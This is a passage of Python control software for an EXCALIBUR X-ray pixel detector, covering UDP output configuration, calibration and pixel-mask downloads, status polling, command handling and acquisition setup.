dest_data_port_offset[:num_fems]]\n ))\n\n # These configurations need to be nested once each each for [Detector[FEM[Chip]]]\n if 'all_fems' in udp_config['nodes'].keys():\n # We need to duplicate the same configuration to all FEMs\n dest_data_addr = [[[]]]\n dest_data_mac = [[[]]]\n dest_data_port = [[[]]]\n for dest_idx, dest in enumerate(udp_config['nodes']['all_fems']):\n dest_data_addr[0][0].append(dest['ipaddr'])\n dest_data_mac[0][0].append(dest['mac'])\n dest_data_port[0][0].append(int(dest['port']))\n\n logging.debug(\n 'Node {node:d} | '\n 'ip: {ipaddr:16s} mac: {mac:s} port: {port:5d}'.format(\n node=dest_idx, **dest)\n )\n else:\n fems = [fem['name'] for fem in udp_config['fems']]\n if all(fem in udp_config['nodes'].keys() for fem in fems):\n # Each FEM needs a different configuration\n dest_data_addr = [[[]] for _ in self._fems]\n dest_data_mac = [[[]] for _ in self._fems]\n dest_data_port = [[[]] for _ in self._fems]\n for fem_idx, fem_key in enumerate(fems):\n for dest_idx, dest in enumerate(udp_config['nodes'][fem_key]):\n dest_data_addr[fem_idx][0].append(dest['ipaddr'])\n dest_data_mac[fem_idx][0].append(dest['mac'])\n dest_data_port[fem_idx][0].append(int(dest['port']))\n\n logging.debug(\n 'FEM {fem:d} Node {node:d} | '\n 'ip: {ipaddr:16s} mac: {mac:s} port: {port:5d}'.format(\n fem=fem_idx, node=dest_idx, **dest)\n )\n else:\n message = \"Failed to parse UDP json config.\" \\\n \"Node config must contain a config for each entry in fems or \" \\\n \"one config with the key 'all_fems'.\\n\" \\\n \"Fems: {}\\n\" \\\n \"Node Config Keys: {}\".format(fems, udp_config['nodes'].keys())\n logging.error(message)\n self.set_error(message)\n return\n\n # Append the UDP destination parameters, noting [[[ ]]] indexing as they are common for\n # all FEMs and chips - there must be a better way to do this\n udp_params.append(ExcaliburParameter(\n 'dest_data_addr', dest_data_addr\n ))\n udp_params.append(ExcaliburParameter(\n 'dest_data_mac', dest_data_mac\n ))\n udp_params.append(ExcaliburParameter(\n 'dest_data_port', dest_data_port\n ))\n\n farm_mode_enable = udp_config['farm_mode']['enable']\n farm_mode_num_dests = udp_config['farm_mode']['num_dests']\n\n # Append the farm mode configuration parameters\n udp_params.append(ExcaliburParameter('farm_mode_enable', [[farm_mode_enable]]))\n udp_params.append(ExcaliburParameter('farm_mode_num_dests', [[farm_mode_num_dests]]))\n\n # Write all the parameters to system\n logging.debug('Writing UDP configuration parameters to system')\n self.hl_write_params(udp_params)\n logging.debug('UDP configuration complete')\n\n def shutdown(self):\n self._executing_updates = False\n self.queue_command(None)\n\n def set_calibration_status(self, fem, status, area=None):\n if area is not None:\n self._calibration_status[area][fem-1] = status\n else:\n for area in ['dac', 'discl', 'disch', 'mask', 'thresh']:\n self._calibration_status[area][fem - 1] = status\n\n logging.debug(\"Calibration: %s\", self._calibration_status)\n bit = 0\n calibration_bitmask = 0\n for area in ['dac', 'discl', 'disch', 'mask', 'thresh']:\n calibration_bitmask += (self._calibration_status[area][fem - 1] << bit)\n bit += 1\n if calibration_bitmask == 0x1F:\n calibration_bitmask += (1 << bit)\n\n self._status['calibration'][fem-1] = calibration_bitmask\n\n def hl_manual_dac_calibration(self, filename):\n logging.debug(\"Manual DAC calibration requested: %s\", filename)\n for fem in self._fems:\n self.set_calibration_status(fem, 0, 'dac')\n self._cb.manual_dac_calibration(self._fems, filename)\n self.download_dac_calibration()\n logging.debug(\"Status: %s\", self._status)\n\n def hl_test_mask_calibration(self, filename):\n logging.debug(\"Test mask file requested: %s\", filename)\n for fem in self._fems:\n self.set_calibration_status(fem, 0, 'mask')\n self._cb.manual_mask_calibration(self._fems, filename)\n self.download_test_masks()\n logging.debug(\"Status: %s\", self._status)\n\n def update_calibration(self, name, value):\n logging.debug(\"Update calibration requested due to %s updated to %s\", name, value)\n if (datetime.now() - self._startup_time).total_seconds() < 10.0:\n # update_calibration requested too early so flag for an update as soon as possible\n self._calibration_required = True\n logging.debug(\"Too early in initialisation to calibrate, queued...\")\n else:\n lv_enabled = 0\n with self._param_lock:\n lv_enabled = self._status['lv_enabled']\n if lv_enabled == 1:\n try:\n self._status['calibrating'] = 1\n self._status['state'] = HLExcaliburDetector.STATE_CALIBRATING\n logging.info(\"Calibrating now...\")\n # Reset all calibration status values prior to loading a new calibration\n for fem in self._fems:\n self.set_calibration_status(fem, 0)\n if self._param['config/cal_file_root'].value != '':\n self._cb.set_file_root(self._param['config/cal_file_root'].value)\n self._cb.set_csm_spm_mode(self._param['config/csm_spm_mode'].index)\n self._cb.set_gain_mode(self._param['config/gain_mode'].index)\n self._cb.set_energy_threshold(self._param['config/energy_threshold'].value)\n self._cb.load_calibration_files(self._fems)\n self.download_dac_calibration()\n self.download_pixel_calibration()\n logging.debug(\"Status: %s\", self._status)\n else:\n logging.debug(\"No calibration root supplied\")\n self._status['calibrating'] = 0\n self._status['state'] = HLExcaliburDetector.STATE_IDLE\n except Exception as ex:\n # If any exception occurs during calibration reset the status item\n self._status['calibrating'] = 0\n self._status['state'] = HLExcaliburDetector.STATE_IDLE\n # Set the error message\n self.set_error(str(ex))\n else:\n logging.debug(\"Not updating calibration as LV is not enabled\")\n\n def get_chip_ids(self, fem_id):\n # Return either the default chip IDs or reversed chip IDs depending on the FEM\n # ID. TODO: \n chip_ids = ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS\n if fem_id & 1 != 1:\n chip_ids = reversed(chip_ids)\n return chip_ids\n\n def download_dac_calibration(self):\n dac_params = []\n\n for (dac_name, dac_param) in self._cb.get_dac(1).dac_api_params():\n logging.debug(\"%s %s\", dac_name, dac_param)\n dac_vals = []\n for fem in self._fems:\n logging.debug(\"Downloading FEM # {}\".format(fem))\n #fem_vals = [self._cb.get_dac(fem).dacs(fem, chip_id)[dac_name] for chip_id in self.get_chip_ids(fem)]\n fem_vals = [self._cb.get_dac(fem).dacs(fem, chip_id)[dac_name] for chip_id in ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS]\n dac_vals.append(fem_vals)\n\n dac_params.append(ExcaliburParameter(dac_param, dac_vals,\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n dac_params.append(ExcaliburParameter('mpx3_dacsense', [[0]],\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n # Write all the parameters to system\n logging.debug('Writing DAC configuration parameters to system {}'.format(str(dac_params)))\n with self._comms_lock:\n self.hl_write_params(dac_params)\n time.sleep(1.0)\n # Now send the command to load the DAC configuration\n self.hl_do_command('load_dacconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'dac')\n self.set_calibration_status(fem, 1, 'thresh')\n\n def download_pixel_masks(self):\n pixel_params = []\n mpx3_pixel_masks = []\n logging.debug(\"Generating mpx3_pixel_mask...\")\n for fem in self._fems:\n chip_ids = self.get_chip_ids(fem)\n fem_vals = [self._cb.get_mask(fem)[chip-1].pixels for chip in chip_ids]\n mpx3_pixel_masks.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_mask', mpx3_pixel_masks,\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n # Write all the parameters to system\n with self._comms_lock:\n self.hl_write_params(pixel_params)\n time.sleep(1.0)\n # Send the command to load the pixel configuration\n self.hl_do_command('load_pixelconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'mask')\n\n def download_test_masks(self):\n chip_ids = ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS\n pixel_params = []\n mpx3_pixel_masks = []\n mpx3_pixel_mask = [0] * ExcaliburDefinitions.FEM_PIXELS_PER_CHIP\n mpx3_pixel_discl = [0] * ExcaliburDefinitions.FEM_PIXELS_PER_CHIP\n mpx3_pixel_disch = [0] * ExcaliburDefinitions.FEM_PIXELS_PER_CHIP\n logging.debug(\"Generating mpx3_pixel_test...\")\n for fem in self._fems:\n fem_vals = [self._cb.get_mask(fem)[chip-1].pixels for chip in chip_ids]\n mpx3_pixel_masks.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_mask', [[mpx3_pixel_mask]],\n fem=self._fems, chip=chip_ids))\n pixel_params.append(ExcaliburParameter('mpx3_pixel_discl', [[mpx3_pixel_discl]],\n fem=self._fems, chip=chip_ids))\n pixel_params.append(ExcaliburParameter('mpx3_pixel_disch', [[mpx3_pixel_disch]],\n fem=self._fems, chip=chip_ids))\n pixel_params.append(ExcaliburParameter('mpx3_pixel_test', mpx3_pixel_masks,\n fem=self._fems, chip=chip_ids))\n\n # Write all the parameters to system\n with self._comms_lock:\n self.hl_write_params(pixel_params)\n time.sleep(1.0)\n\n # Send the command to load the pixel configuration\n self.hl_do_command('load_pixelconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'mask')\n\n def download_pixel_calibration(self):\n #chip_ids = ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS\n pixel_params = []\n mpx3_pixel_masks = []\n # Write all the parameters to system\n logging.debug(\"Writing pixel parameters to hardware...\")\n\n logging.debug(\"Generating mpx3_pixel_mask...\")\n for fem in self._fems:\n chip_ids = self.get_chip_ids(1)\n fem_vals = [self._cb.get_mask(fem)[chip-1].pixels for chip in chip_ids]\n mpx3_pixel_masks.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_mask', mpx3_pixel_masks,\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n with self._comms_lock:\n self.hl_write_params(pixel_params)\n\n time.sleep(1.0)\n\n # Send the command to load the pixel configuration\n logging.debug(\"Sending the load_pixelconfig command...\")\n self.hl_do_command('load_pixelconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'mask')\n\n pixel_params = []\n mpx3_pixel_discl = []\n logging.debug(\"Generating mpx3_pixel_discl...\")\n for fem in self._fems:\n chip_ids = self.get_chip_ids(1)\n fem_vals = [self._cb.get_discL(fem)[chip-1].pixels for chip in chip_ids]\n mpx3_pixel_discl.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_discl', mpx3_pixel_discl,\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n with self._comms_lock:\n self.hl_write_params(pixel_params)\n\n time.sleep(1.0)\n\n # Send the command to load the pixel configuration\n logging.debug(\"Sending the load_pixelconfig command...\")\n self.hl_do_command('load_pixelconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'discl')\n\n pixel_params = []\n mpx3_pixel_disch = []\n logging.debug(\"Generating mpx3_pixel_disch...\")\n for fem in self._fems:\n chip_ids = self.get_chip_ids(1)\n fem_vals = [self._cb.get_discH(fem)[chip - 1].pixels for chip in chip_ids]\n mpx3_pixel_disch.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_disch', mpx3_pixel_disch,\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n with self._comms_lock:\n self.hl_write_params(pixel_params)\n \n time.sleep(1.0)\n\n # Send the command to load the pixel configuration\n logging.debug(\"Sending the load_pixelconfig command...\")\n self.hl_do_command('load_pixelconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'disch')\n\n def status_loop(self):\n # Status loop has two polling rates, fast and slow\n # Fast poll is currently set to 0.2 s\n # Slow poll is currently set to 5.0 s\n if self._lv_toggle_required:\n # Short pause to ensure the power card ID has been set from the low level detector\n time.sleep(1.0)\n # We only ever toggle the lv once if required\n self._lv_toggle_required = False\n # Perform the toggling of the command bit for lv\n self.hl_toggle_lv()\n\n while self._executing_updates:\n if (datetime.now() - self._startup_time).total_seconds() > 10.0:\n if self._calibration_required:\n try:\n self._calibration_required = False\n self.update_calibration('lv_enabled', '1')\n except:\n pass\n if (datetime.now() - self._slow_update_time).seconds > 10.0:\n self._slow_update_time = datetime.now()\n self.slow_read()\n if (datetime.now() - self._medium_update_time).seconds > 10.0:\n self._medium_update_time = datetime.now()\n self.power_card_read()\n if (datetime.now() - self._fast_update_time).microseconds > 100000:\n self._fast_update_time = datetime.now()\n self.fast_read()\n time.sleep(0.1)\n\n def queue_command(self, command):\n #if self._command_lock.acquire(False):\n self._command_queue.put(command, block=False)\n # self._command_lock.release()\n #else:\n # self.set_error(\"Cannot submit command whilst another is active\")\n\n def command_loop(self):\n running = True\n while running:\n try:\n command = self._command_queue.get()\n if command:\n with self._command_lock:\n self.execute_command(command)\n else:\n running = False\n except Exception as e:\n type_, value_, traceback_ = sys.exc_info()\n ex = traceback.format_exception(type_, value_, traceback_)\n logging.error(e)\n self.set_error(\"Unhandled exception: {} => {}\".format(str(e), str(ex)))\n\n def execute_command(self, command):\n path = command['path']\n data = command['data']\n try:\n if path in self._param:\n self._param[path].set_value(data)\n elif path == 'command/initialise':\n # Initialise the FEMs\n logging.debug('Initialise has been called')\n self.hl_initialise()\n elif path == 'command/force_calibrate':\n self.update_calibration('reload', 'manual')\n elif path == 'command/configure_dac':\n # Configure the DAC\n dac_file = self._param['config/test_dac_file'].value\n logging.debug('Manual DAC calibration has been called with file: %s', dac_file)\n self.hl_manual_dac_calibration(dac_file)\n elif path == 'command/configure_mask':\n # Apply a test maks\n mask_file = self._param['config/test_mask_file'].value\n logging.debug('Manual mask file download has been called with file: %s', mask_file)\n self.hl_test_mask_calibration(mask_file)\n elif path == 'command/24bit_acquire':\n # Perform a 24 bit acquisition loop\n self.hl_do_24bit_acquisition()\n# elif path == 'command/start_acquisition':\n# # Starting an acquisition!\n# logging.debug('Start acquisition has been called')\n# self.hl_arm_detector()\n# self.do_acquisition()\n# elif path == 'command/stop_acquisition':\n# # Starting an acquisition!\n# logging.debug('Abort acquisition has been called')\n# self.hl_stop_acquisition()\n else:\n super(HLExcaliburDetector, self).set(path, data)\n except Exception as ex:\n self.set_error(str(ex))\n raise ExcaliburDetectorError(str(ex))\n\n def get(self, path):\n with self._param_lock:\n if path == 'command/initialise':\n response = {'value': 1}\n elif path == 'command/force_calibrate':\n response = {'value': 1}\n elif path == 'command/configure_dac':\n response = {'value': 1}\n elif path == 'command/configure_mask':\n response = {'value': 1}\n elif path in self._param:\n response = self._param[path].get()\n elif self.search_status(path) is not None:\n response = {'value': self.search_status(path)}\n try:\n response.update(super(HLExcaliburDetector, self).get(path))\n except:\n # Valid to fail if the get request is for a high level item\n pass\n else:\n response = super(HLExcaliburDetector, self).get(path)\n\n return response\n\n def set(self, path, data):\n self.clear_error()\n try:\n if path == 'command/start_acquisition':\n # Starting an acquisition!\n logging.debug('Start acquisition has been called')\n self.hl_arm_detector()\n self.do_acquisition()\n elif path == 'command/stop_acquisition':\n # Starting an acquisition!\n logging.debug('Abort acquisition has been called')\n self.hl_stop_acquisition()\n else:\n self.queue_command({'path': path, 'data': data})\n except Exception as ex:\n self.set_error(str(ex))\n raise ExcaliburDetectorError(str(ex))\n\n def set_error(self, err):\n # Record the error message into the status\n self._status['error'] = err\n\n def clear_error(self):\n # Record the error message into the status\n self._status['error'] = \"\"\n\n def search_status(self, path):\n items = path.split('/')\n item_dict = None\n if items[0] == 'status':\n try:\n item_dict = self._status\n for item in items[1:]:\n item_dict = item_dict[item]\n except KeyError as ex:\n item_dict = None\n return item_dict\n\n def fast_read(self):\n status = {}\n with self._param_lock:\n bit_depth = self._param['config/counter_depth'].value\n bps = 1\n if bit_depth == '12':\n bps = 2\n elif bit_depth == '24':\n bps = 4\n self._status['sensor']['bytes'] = self._status['sensor']['width'] * self._status['sensor']['height'] * bps\n\n frame_rate = 0.0\n if not self._24bit_mode:\n with self._comms_lock:\n acq_completion_state_mask = 0x40000000\n # Connect to the hardware\n if not self.connected:\n self.connect({'state': True})\n\n fem_params = ['frames_acquired', 'control_state']\n\n read_params = ExcaliburReadParameter(fem_params)\n self.read_fe_param(read_params)\n\n while True:\n time.sleep(0.01)\n if not self.command_pending():\n if self._get('command_succeeded'):\n logging.info(\"Command has succeeded\")\n else:\n logging.info(\"Command has failed\")\n break\n vals = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read']['value']\n logging.info(\"Raw fast read status: %s\", vals)\n # Calculate the minimum number of frames from the fems, as this will be the actual complete frame count\n frames_acquired = min(vals['frames_acquired'])\n self._hw_frames_acquired = frames_acquired\n #acq_completed = all(\n # [((state & acq_completion_state_mask) == acq_completion_state_mask) for state in vals['control_state']]\n #)\n if self._acquiring:\n # Record the frames acquired\n self._frames_acquired = frames_acquired\n # We are acquiring so check to see if we have the correct number of frames\n if frames_acquired == self._acq_frame_count:\n self._acquiring = False\n # Acquisition has finished so we must send the stop command\n logging.debug(\"stop_acquisition called at end of a complete acquisition\")\n self.hl_stop_acquisition()\n elif frames_acquired > self._acq_frame_count:\n # There has been an error in the acquisition, we should never have too many frames\n self._acquiring = False\n # Acquisition has finished so we must send the stop command\n logging.debug(\"stop_acquisition called at end of a complete acquisition\")\n self.hl_stop_acquisition()\n else:\n if frames_acquired > 0:\n if self._frame_count_time is None:\n self._frame_start_count = frames_acquired\n self._frame_count_time = datetime.now()\n # Check to see if we have timed out\n delta_us = (datetime.now() - self._frame_count_time).microseconds\n delta_s = (datetime.now() - self._frame_count_time).seconds\n frame_rate = float(frames_acquired-self._frame_start_count) / (float(delta_s) + (float(delta_us) / 1000000.0))\n else:\n self._frame_start_count = 0\n self._frame_count_time = None\n frame_rate = 0.0\n\n # We can only time out if we are not waiting for triggers\n if self._param['config/trigger_mode'].index == ExcaliburDefinitions.FEM_TRIGMODE_INTERNAL:\n delta_t = (datetime.now() - self._acq_start_time).seconds\n # Work out the worst case for number of expected frames (assuming 25% plus 5 second startup)\n delta_t -= 5.0\n if delta_t > 0.0:\n expected_frames = int(delta_t / (self._acq_exposure * 1.25))\n logging.debug(\"We would have expected %d frames by now\", expected_frames)\n if expected_frames > frames_acquired:\n #self._acquiring = False\n # Acquisition has finished so we must send the stop command\n #self.set_error(\"stop_acquisition called due to a timeout\")\n logging.debug(\"stop_acquisition called due to a timeout\")\n #self.hl_stop_acquisition()\n\n init_state = []\n for fem_state in self.get('status/fem')['fem']:\n init_state.append(fem_state['state'])\n\n status = {'fem_state': init_state,\n 'frames_acquired': self._frames_acquired,\n 'fem_frames': vals['frames_acquired'],\n 'frame_rate': frame_rate,\n 'acquisition_complete': (not self._acquiring)}\n with self._param_lock:\n self._status.update(status)\n logging.debug(\"Fast update status: %s\", status)\n\n def power_card_read(self):\n with self._comms_lock:\n # Do not perform a slow read if an acquisition is taking place\n if not self._acquiring:\n # Connect to the hardware\n if not self.connected:\n self.connect({'state': True})\n\n powercard_params = ['fe_lv_enable',\n 'fe_hv_enable',\n 'pwr_p5va_vmon',\n 'pwr_p5vb_vmon',\n 'pwr_p5v_fem00_imon',\n 'pwr_p5v_fem01_imon',\n 'pwr_p5v_fem02_imon',\n 'pwr_p5v_fem03_imon',\n 'pwr_p5v_fem04_imon',\n 'pwr_p5v_fem05_imon',\n 'pwr_p48v_vmon',\n 'pwr_p48v_imon',\n 'pwr_p5vsup_vmon',\n 'pwr_p5vsup_imon',\n 'pwr_humidity_mon',\n 'pwr_air_temp_mon',\n 'pwr_coolant_temp_mon',\n 'pwr_coolant_flow_mon',\n 'pwr_p3v3_imon',\n 'pwr_p1v8_imonA',\n 'pwr_bias_imon',\n 'pwr_p3v3_vmon',\n 'pwr_p1v8_vmon',\n 'pwr_bias_vmon',\n 'pwr_p1v8_imonB',\n 'pwr_p1v8_vmonB',\n 'pwr_coolant_temp_status',\n 'pwr_humidity_status',\n 'pwr_coolant_flow_status',\n 'pwr_air_temp_status',\n 'pwr_fan_fault']\n fe_params = powercard_params\n read_params = ExcaliburReadParameter(fe_params, fem=self.powercard_fem_idx+1)\n self.read_fe_param(read_params)\n\n while True:\n time.sleep(0.1)\n if not self.command_pending():\n if self._get('command_succeeded'):\n logging.info(\"Command has succeeded\")\n status = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read'][\n 'value']\n with self._param_lock:\n # Check for the current HV enabled state\n hv_enabled = 0\n # Greater than hv_bias means the HV is enabled\n if status['pwr_bias_vmon'][0] > self._param['config/hv_bias'].value - 5.0:\n hv_enabled = 1\n self._status['hv_enabled'] = hv_enabled\n\n for param in powercard_params:\n if param in status:\n val = status[param]\n if isinstance(val, list):\n self._status[param] = val[0]\n else:\n self._status[param] = val\n else:\n logging.error(\"Command has failed\")\n with self._param_lock:\n for param in powercard_params:\n self._status[param] = None\n break\n logging.debug(\"Power card update status: %s\", self._status)\n\n def slow_read(self):\n status = {}\n with self._comms_lock:\n # Do not perform a slow read if an acquisition is taking place\n if not self._acquiring:\n # Connect to the hardware\n if not self.connected:\n self.connect({'state': True})\n\n fem_params = ['fem_local_temp', 'fem_remote_temp', 'moly_temp', 'moly_humidity']\n supply_params = ['supply_p1v5_avdd1', 'supply_p1v5_avdd2', 'supply_p1v5_avdd3', 'supply_p1v5_avdd4',\n 'supply_p1v5_vdd1', 'supply_p2v5_dvdd1']\n\n fe_params = fem_params + supply_params + ['mpx3_dac_out']\n\n read_params = ExcaliburReadParameter(fe_params)\n self.read_fe_param(read_params)\n\n while True:\n time.sleep(0.1)\n if not self.command_pending():\n if self._get('command_succeeded'):\n logging.info(\"Command has succeeded\")\n status = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read'][\n 'value']\n with self._param_lock:\n lv_enabled = 1\n for param in fe_params:\n if param in status:\n val = []\n if param in supply_params:\n for item in status[param]:\n if item != 1:\n val.append(0)\n else:\n val.append(1)\n else:\n if param == 'moly_temp' or param == 'moly_humidity':\n for item in status[param]:\n if item < 0.0:\n val.append(None)\n lv_enabled = 0\n else:\n val.append(item)\n else:\n val = status[param]\n self._status[param] = val\n # Catch when the lv has been enabled and attempt to re-send calibration\n # Also do not return the humidity right away as it has a settling time\n if self._status['lv_enabled'] == 0 and lv_enabled == 1:\n self._calibration_required = True\n self._moly_humidity_counter = 3\n if self._moly_humidity_counter > 0:\n self._status['moly_humidity'] = self._default_status\n self._moly_humidity_counter -= 1\n self._status['lv_enabled'] = lv_enabled\n else:\n logging.info(\"Command has failed\")\n with self._param_lock:\n for param in fe_params:\n self._status[param] = self._default_status\n logging.error('Command read_fe_param failed on following FEMS:')\n fem_error_count = 0\n for (idx, fem_id, error_code, error_msg) in self.get_fem_error_state():\n if error_code != 0:\n logging.error(\n ' FEM idx {} id {} : {} : {}'.format(idx, fem_id, error_code, error_msg))\n fem_error_count += 1\n err_msg = 'Command read_fe_param failed on {} FEMs'.format(fem_error_count)\n self.set_error(err_msg)\n\n #if param in status:\n # self._status[param] = status[param]\n break\n\n if not self._read_efuse_ids:\n # Only read the efuse IDs if the LV is enabled\n if self._status['lv_enabled'] == 1:\n response_status, efuse_dict = self.hl_efuseid_read()\n self._status.update(efuse_dict)\n logging.debug(\"EFUSE return status: %s\", response_status)\n if response_status == 0:\n self._read_efuse_ids = True\n\n logging.debug(\"Slow update status: %s\", self._status)\n\n def hl_arm_detector(self):\n # Perform all of the actions required to get the detector ready for an acquisition\n with self._comms_lock:\n self.clear_error()\n\n # Start by downloading the UDP configuration\n self.hl_load_udp_config('arming', self._param['config/udp_file'].value)\n\n\n def hl_do_dac_scan(self):\n\n logging.info(\"Executing DAC scan ...\")\n\n # Build a list of parameters to be written toset up the DAC scan\n scan_params = []\n\n scan_dac = self._param['config/scan_dac_num'].value\n logging.info(' Setting scan DAC to {}'.format(scan_dac))\n scan_params.append(ExcaliburParameter('dac_scan_dac', [[scan_dac]]))\n\n scan_start = self._param['config/scan_dac_start'].value\n logging.info(' Setting scan start value to {}'.format(scan_start))\n scan_params.append(ExcaliburParameter('dac_scan_start', [[scan_start]]))\n\n scan_stop = self._param['config/scan_dac_stop'].value\n logging.info(' Setting scan stop value to {}'.format(scan_stop))\n scan_params.append(ExcaliburParameter('dac_scan_stop', [[scan_stop]]))\n\n scan_step = self._param['config/scan_dac_step'].value\n logging.info(' Setting scan step size to {}'.format(scan_step))\n scan_params.append(ExcaliburParameter('dac_scan_step', [[scan_step]]))\n\n # Record the acquisition exposure time\n self._acq_exposure = self._param['config/exposure_time'].value\n\n acquisition_time = int(self._param['config/exposure_time'].value * 1000.0)\n logging.info(' Setting acquisition time to {} ms'.format(acquisition_time))\n scan_params.append(ExcaliburParameter('acquisition_time', [[acquisition_time]]))\n\n\n readout_mode = ExcaliburDefinitions.FEM_READOUT_MODE_SEQUENTIAL\n logging.info(' Setting ASIC readout mode to {}'.format(\n ExcaliburDefinitions.readout_mode_name(readout_mode)\n ))\n scan_params.append(ExcaliburParameter('mpx3_readwritemode', [[readout_mode]]))\n\n colour_mode = self._param['config/colour_mode']\n logging.info(' Setting ASIC colour mode to {} '.format(colour_mode.value))\n scan_params.append(ExcaliburParameter('mpx3_colourmode', [[colour_mode.index]]))\n\n csmspm_mode = self._param['config/csm_spm_mode']\n logging.info(' Setting ASIC pixel mode to {} '.format(csmspm_mode.value))\n scan_params.append(ExcaliburParameter('mpx3_csmspmmode', [[csmspm_mode.index]]))\n\n disc_csm_spm = self._param['config/disc_csm_spm']\n logging.info(' Setting ASIC discriminator output mode to {} '.format(disc_csm_spm.value))\n scan_params.append(ExcaliburParameter('mpx3_disccsmspm', [[disc_csm_spm.index]]))\n\n equalization_mode = self._param['config/equalization_mode']\n logging.info(' Setting ASIC equalization mode to {} '.format(equalization_mode.value))\n scan_params.append(ExcaliburParameter('mpx3_equalizationmode', [[equalization_mode.index]]))\n\n gain_mode = self._param['config/gain_mode']\n logging.info(' Setting ASIC gain mode to {} '.format(gain_mode.value))\n scan_params.append(ExcaliburParameter('mpx3_gainmode', [[gain_mode.index]]))\n\n counter_select = self._param['config/counter_select'].value\n logging.info(' Setting ASIC counter select to {} '.format(counter_select))\n scan_params.append(ExcaliburParameter('mpx3_counterselect', [[counter_select]]))\n\n counter_depth = self._param['config/counter_depth'].value\n logging.info(' Setting ASIC counter depth to {} bits'.format(counter_depth))\n scan_params.append(ExcaliburParameter('mpx3_counterdepth',\n [[ExcaliburDefinitions.FEM_COUNTER_DEPTH_MAP[counter_depth]]]))\n\n operation_mode = ExcaliburDefinitions.FEM_OPERATION_MODE_DACSCAN\n logging.info(' Setting operation mode to {}'.format(\n ExcaliburDefinitions.operation_mode_name(operation_mode)\n ))\n scan_params.append(ExcaliburParameter('mpx3_operationmode', [[operation_mode]]))\n\n lfsr_bypass_mode = ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_DISABLED\n logging.info(' Setting LFSR bypass mode to {}'.format(\n ExcaliburDefinitions.lfsr_bypass_mode_name(lfsr_bypass_mode)\n ))\n scan_params.append(ExcaliburParameter('mpx3_lfsrbypass', [[lfsr_bypass_mode]]))\n\n logging.info(' Disabling local data receiver thread')\n scan_params.append(ExcaliburParameter('datareceiver_enable', [[0]]))\n\n # Write all the parameters to system\n logging.debug('Writing configuration parameters to system {}'.format(str(scan_params)))\n self.hl_write_params(scan_params)\n\n self._frame_start_count = 0\n self._frame_count_time = None\n\n # Send start acquisition command\n logging.debug('Sending start acquisition command')\n self.hl_start_acquisition()\n logging.debug('Start acquisition completed')\n\n def do_acquisition(self):\n with self._comms_lock:\n self.clear_error()\n if self._hw_frames_acquired > 0:\n # Counters have not cleared yet, send a stop acquisition before restarting\n self.hl_stop_acquisition()\n\n # Set the acquiring flag\n self._acquiring = True\n self._acq_start_time = datetime.now()\n status = {'acquisition_complete': (not self._acquiring)}\n self._status.update(status)\n # Resolve the acquisition operating mode appropriately, handling burst and matrix read if necessary\n operation_mode = self._param['config/operation_mode']\n\n # Check if the operational mode is DAC scan.\n if operation_mode.index == ExcaliburDefinitions.FEM_OPERATION_MODE_DACSCAN:\n logging.debug('DAC scan requested so entering DAC scan mode')\n self.hl_do_dac_scan()\n return\n\n # if self.args.burst_mode:\n # operation_mode = ExcaliburDefinitions.FEM_OPERATION_MODE_BURST\n #\n # if self.args.matrixread:\n # if self.args.burst_mode:\n # logging.warning('Cannot select burst mode and matrix read simultaneously, ignoring burst option')\n # operation_mode = ExcaliburDefinitions.FEM_OPERATION_MODE_MAXTRIXREAD\n #\n\n num_frames = self._param['config/num_images'].value\n image_mode = self._param['config/image_mode'].value\n logging.info(' Image mode set to {}'.format(image_mode))\n # Check for single image mode\n if image_mode == ExcaliburDefinitions.FEM_IMAGEMODE_NAMES[0]:\n # Single image mode requested, set num frames to 1\n logging.info(' Single image mode, setting number of frames to 1')\n num_frames = 1\n logging.info(' Setting number of frames to {}'.format(num_frames))\n\n\n\n # Temporary 24 bit mode setup\n # TODO: Remove this once 24 bit mode has been implemented within the firmware\n # 24-bit reads are a special case, so set things up appropriately in this mode\n logging.info(\"config/counter_depth value: {}\".format(self._param['config/counter_depth'].value))\n if int(self._param['config/counter_depth'].value) == 24:\n self._24bit_mode = True\n\n # Force counter select to C1, C0 is read manually afterwards\n self._param['config/counter_select'].set_value(1, callback=False)\n\n # For acquisitions with > 1 frame, run multiple acquisition loops instea\n self._acquisition_loops = num_frames\n num_frames = 1\n logging.info(\"Configuring 24-bit acquisition with {} 1-frame loops\".format(self._acquisition_loops))\n\n # In 24-bit mode, force a reset of the UDP frame counter before first acquisition loop\n logging.info('Resetting UDP frame counter for 24 bit mode')\n cmd_ok, err_msg = self.hl_do_command('reset_udp_counter')\n logging.info(\"{} => {}\".format(cmd_ok, err_msg))\n if not cmd_ok:\n logging.error(\"UDP counter reset failed: {}\".format(err_msg))\n return\n else:\n self._24bit_mode = False\n # End of 24 bit mode\n\n # Build a list of parameters to be written to the system to set up acquisition\n write_params = []\n\n tp_count = self._param['config/num_test_pulses'].value\n logging.info(' Setting test pulse count to {}'.format(tp_count))\n write_params.append(ExcaliburParameter('mpx3_numtestpulses', [[tp_count]]))\n 